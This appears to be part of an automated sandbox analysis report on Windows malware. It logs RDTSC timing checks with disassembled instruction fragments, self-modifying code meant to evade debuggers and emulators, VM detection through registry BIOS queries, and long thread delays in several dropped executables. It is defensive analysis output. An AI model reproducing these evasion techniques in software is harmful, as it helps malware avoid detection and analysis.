                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0CC7 second address: 53E0CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3430D34980h 0x00000012 sbb ecx, 17A32CF8h 0x00000018 jmp 00007F3430D3497Bh 0x0000001d popfd 0x0000001e mov bh, cl 0x00000020 popad 0x00000021 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0CF9 second address: 53E0D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3430D3ED41h 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0D0E second address: 53E0D2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edi, 29AD356Eh 0x00000010 popad 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0D87 second address: 53E0DA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0DA3 second address: 53E0DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0DA9 second address: 53E0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0DAD second address: 53E0DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53E0DBE second address: 53E0DD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: BEF40C second address: BEF41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 jnc 00007F3430D3497Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: BEF41C second address: BEECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 jne 00007F3430D3ED3Ch 0x0000000c push dword ptr [ebp+122D02E9h] 0x00000012 jg 00007F3430D3ED4Ch 0x00000018 pushad 0x00000019 movsx esi, si 0x0000001c jmp 00007F3430D3ED41h 0x00000021 popad 0x00000022 call dword ptr [ebp+122D1DFEh] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D2013h], eax 0x0000002f jg 00007F3430D3ED3Fh 0x00000035 pushad 0x00000036 cmc 0x00000037 add dword ptr [ebp+122D2013h], ecx 0x0000003d popad 0x0000003e xor eax, eax 0x00000040 mov dword ptr [ebp+122D2013h], eax 0x00000046 mov edx, dword ptr [esp+28h] 0x0000004a mov dword ptr [ebp+122D1DE8h], edi 0x00000050 jmp 00007F3430D3ED49h 0x00000055 mov dword ptr [ebp+122D3838h], eax 0x0000005b mov dword ptr [ebp+122D1E0Dh], ecx 0x00000061 mov esi, 0000003Ch 0x00000066 or dword ptr [ebp+122D1E3Fh], ecx 0x0000006c jp 00007F3430D3ED4Fh 0x00000072 jmp 00007F3430D3ED49h 0x00000077 add esi, dword ptr [esp+24h] 0x0000007b jmp 00007F3430D3ED41h 0x00000080 lodsw 0x00000082 sub dword ptr [ebp+122D30CDh], edx 0x00000088 add eax, dword ptr [esp+24h] 0x0000008c jmp 00007F3430D3ED46h 0x00000091 mov ebx, dword ptr [esp+24h] 0x00000095 stc 0x00000096 push eax 0x00000097 push eax 0x00000098 push edx 0x00000099 pushad 0x0000009a jns 00007F3430D3ED36h 0x000000a0 jo 00007F3430D3ED36h 0x000000a6 popad 0x000000a7 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D6A4F8 second address: D6A504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3430D3ED36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D6A504 second address: D6A516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 jg 00007F3430D34992h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D72FF4 second address: D73001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3430D3497Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D73089 second address: D730A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F3430D3ED3Ch 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D730AC second address: D73167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F3430D3ED36h 0x00000009 jmp 00007F3430D3ED42h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jmp 00007F3430D3ED41h 0x00000019 jmp 00007F3430D3ED3Bh 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jmp 00007F3430D3ED48h 0x00000029 jl 00007F3430D3ED38h 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 pop eax 0x00000033 jnl 00007F3430D3ED3Ah 0x00000039 push 00000003h 0x0000003b jp 00007F3430D3ED45h 0x00000041 jmp 00007F3430D3ED3Fh 0x00000046 adc edi, 0AA0BFB0h 0x0000004c push 00000000h 0x0000004e stc 0x0000004f push 00000003h 0x00000051 pushad 0x00000052 jmp 00007F3430D3ED47h 0x00000057 movzx eax, bx 0x0000005a popad 0x0000005b push 898994A8h 0x00000060 jo 00007F3430D3ED3Eh 0x00000066 push edi 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D73167 second address: D7319E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 xor dword ptr [esp], 498994A8h 0x0000000c cmc 0x0000000d lea ebx, dword ptr [ebp+12457F25h] 0x00000013 je 00007F3430D3497Ah 0x00000019 mov dx, 7016h 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3430D34987h 0x00000025 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D7319E second address: D731BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D7329E second address: D732A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3430D34976h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D732A8 second address: D732E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e jmp 00007F3430D3ED41h 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jo 00007F3430D3ED40h 0x0000001e pushad 0x0000001f jnp 00007F3430D3ED36h 0x00000025 push eax 0x00000026 pop eax 0x00000027 popad 0x00000028 mov eax, dword ptr [eax] 0x0000002a push ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91D25 second address: D91D30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F3430D34976h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91D3E second address: D91D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3430D34976h 0x0000000a pop edx 0x0000000b pushad 0x0000000c je 00007F3430D34976h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91EAE second address: D91EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3ED45h 0x00000009 jmp 00007F3430D3ED3Dh 0x0000000e jmp 00007F3430D3ED3Ch 0x00000013 popad 0x00000014 jng 00007F3430D3ED3Ah 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D91EF5 second address: D91F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3ED44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D921BC second address: D921D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3430D34981h 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D9236A second address: D92374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F3430D34976h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D92374 second address: D9239B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Ah 0x00000007 jbe 00007F3430D3ED36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3430D3ED3Fh 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D92676 second address: D92684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 ja 00007F3430D34976h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D927FE second address: D92824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED48h 0x00000007 jns 00007F3430D3ED36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D9671F second address: D96744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3430D3ED42h 0x00000011 jnc 00007F3430D3ED36h 0x00000017 popad 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D68A56 second address: D68A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3430D34976h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007F3430D34976h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA0402 second address: DA041E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D9FFDF second address: D9FFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F3430D3ED42h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA187E second address: DA18AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3430D34976h 0x0000000a popad 0x0000000b pop ebx 0x0000000c xor dword ptr [esp], 7CB9E9B2h 0x00000013 push ecx 0x00000014 mov esi, edi 0x00000016 pop edi 0x00000017 push 265AEA0Bh 0x0000001c pushad 0x0000001d pushad 0x0000001e jne 00007F3430D34976h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 jng 00007F3430D3497Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA24E4 second address: DA2508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a sub dword ptr [ebp+122D1FA4h], eax 0x00000010 push eax 0x00000011 push edi 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA3852 second address: DA386F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA386F second address: DA388A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3430D3ED46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA6919 second address: DA6976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3430D3497Bh 0x00000008 jnp 00007F3430D34976h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 xor esi, 4D0E793Fh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F3430D34978h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D1E55h], esi 0x0000003e jg 00007F3430D34979h 0x00000044 push eax 0x00000045 jo 00007F3430D34984h 0x0000004b push eax 0x0000004c push edx 0x0000004d push edx 0x0000004e pop edx 0x0000004f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA745B second address: DA74BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F3430D3ED3Eh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F3430D3ED38h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov si, ax 0x00000030 xor dword ptr [ebp+122D1D1Fh], edi 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+1246A0A9h], esi 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 xor dword ptr [ebp+122D230Ah], eax 0x00000047 pop esi 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d pop eax 0x0000004e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DABFDE second address: DABFF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3430D3ED41h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DACF57 second address: DACF65 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3430D3ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DADF95 second address: DADF9F instructions: 0x00000000 rdtsc 0x00000002 je 00007F3430D34976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB374A second address: DB37B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F3430D3497Eh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F3430D34978h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F3430D34978h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov edi, esi 0x00000046 push 00000000h 0x00000048 mov dword ptr [ebp+122D37E0h], ebx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB37B7 second address: DB37C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3430D34976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB4807 second address: DB4811 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3430D3ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAD098 second address: DAD0A2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3430D3ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Tries to evade debugger and weak emulator (self modifying code)
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESpecial instruction interceptor: First address: BEEC44 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESpecial instruction interceptor: First address: BEED0A instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESpecial instruction interceptor: First address: D94A3E instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESpecial instruction interceptor: First address: BEC4D6 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESpecial instruction interceptor: First address: E26429 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 36EC44 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 36ED0A instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 514A3E instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 36C4D6 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 5A6429 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSpecial instruction interceptor: First address: 8FEC00 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSpecial instruction interceptor: First address: AA21C6 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSpecial instruction interceptor: First address: AC7FBE instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSpecial instruction interceptor: First address: B21423 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSpecial instruction interceptor: First address: B3193E instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSpecial instruction interceptor: First address: CD825C instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSpecial instruction interceptor: First address: CE4A58 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSpecial instruction interceptor: First address: D6B5AD instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSpecial instruction interceptor: First address: FCD919 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSpecial instruction interceptor: First address: FCB4BA instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSpecial instruction interceptor: First address: 119562E instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSpecial instruction interceptor: First address: 117B38B instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSpecial instruction interceptor: First address: 11F7B98 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeMemory allocated: 51F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeMemory allocated: 5450000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeMemory allocated: 5250000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_053E0C50 rdtsc 11_2_053E0C50
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeThread delayed: delay time: 922337203685477
